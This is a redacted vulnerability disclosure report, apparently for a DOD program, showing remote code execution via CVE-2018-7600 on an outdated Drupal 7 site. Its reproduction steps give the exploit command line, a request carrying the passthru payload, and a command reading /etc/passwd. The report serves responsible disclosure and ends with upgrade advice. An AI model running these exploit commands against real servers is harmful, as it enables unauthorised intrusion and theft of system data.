[CVE-2018-7600] Remote Code Execution due to outdated Drupal server on www.█████████

## Summary Due to an outdated Drupal version, remote code execution is possible on `www.█████` via CVE-2018-7600. ## Description Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations. Vulnerable Host: * `www.███` Visiting `https://www.███/███` we can see that we have a Drupal with version 7.54, which was updated the last time in 2017-02-01. There are several critical and highly critical vulnerabilities known for this version (see `https://api.drupal.org/api/drupal/████████/7.x` and `https://www.drupal.org/security`). Among them is `SA-CORE-2018-002` (CVE-2018-7600), which I will demonstrate here. Note: I am reporting this here, since the page `https://www.███████` seems to belong to the █████████, which belongs to the DOD. The footer further states: `██████. [...]` ## Step-by-step Reproduction Instructions 1. Download the git repository with the exploit: `git clone https://github.com/dreadlocked/Drupalgeddon2.git && cd Drupalgeddon2` * Install dependencies if necessary `gem install nokogiri` 2. Run the exploit with ruby `ruby drupalgeddon2-customizable-beta.rb -u https://www.████████/ -v 7 -c id --form user/login` Parameters explanation: ``` -u, --url URL Service URL -v, --version VERSION Target Drupal version {7,8} -c, --command COMMAND Command to execute --form Form to attack, by default '/user/password' in Drupal 7 ``` The above command outputs: ``` root@5b08dc005375:/Drupalgeddon2# ruby drupalgeddon2-customizable-beta.rb -u https://www.████/ -v 7 -c id --form user/login drupalgeddon2-customizable-beta.rb:184: warning: URI.escape is obsolete [i] Requesting: www.███████//user/password/?name[%23post_render][]=passthru&name[%23markup]=id&name[%23type]=markup [i] POST: form_id=user_pass&_triggering_element_name=name [i] 200 [*] Obtained build id!: ████████ drupalgeddon2-customizable-beta.rb:220: warning: URI.escape is obsolete drupalgeddon2-customizable-beta.rb:221: warning: URI.escape is obsolete [i] Requesting: www.█████/file/ajax/name/%23value/██████ [i] POST: form_build_id=█████ [i] Response code: 200 uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0 root@5b08dc005375:/Drupalgeddon2# ``` As we can see, we successfully executed the `id` command, which responded with `uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0` I am also providing the output of `/etc/passwd` which I obtained with command ``` ruby drupalgeddon2-customizable-beta.rb -u https://www.██████/ -v 7 -c "cat /etc/passwd" --form user/login ``` Output: ``` ████ ██████ ███████ ████████ █████████ █████████ ██████████ ███ ████ █████████ ██████████ ████ ██████████ ████████ █████ █████████ ██████████ ████████ ██████████ ██████ ████ █████████ ███████ ███████ ████ ██████████ ███ █████ █████ ██████ ``` ## Resources * https://api.drupal.org/api/drupal/█████/7.x * https://www.drupal.org/security * https://github.com/dreadlocked/Drupalgeddon2 * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600 * https://www.drupal.org/sa-core-2018-002 ## Mitigation/Remediation Actions Upgrade to the most recent version of Drupal 7 core. ## Impact Critical - Remote Code Execution